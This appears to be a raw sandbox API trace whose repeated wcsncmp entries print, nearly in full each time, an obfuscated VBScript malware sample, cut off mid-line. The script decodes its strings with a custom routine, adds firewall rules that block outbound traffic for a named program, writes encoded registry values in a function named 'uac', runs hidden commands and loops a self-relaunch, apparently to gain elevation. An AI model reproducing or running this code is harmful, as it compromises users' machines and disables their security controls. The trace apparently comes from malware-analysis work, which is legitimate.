bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.922] wcsncmp (_String1="im key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.922] wcsncmp (_String1="m key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.922] wcsncmp (_String1=" key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.922] wcsncmp (_String1="key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 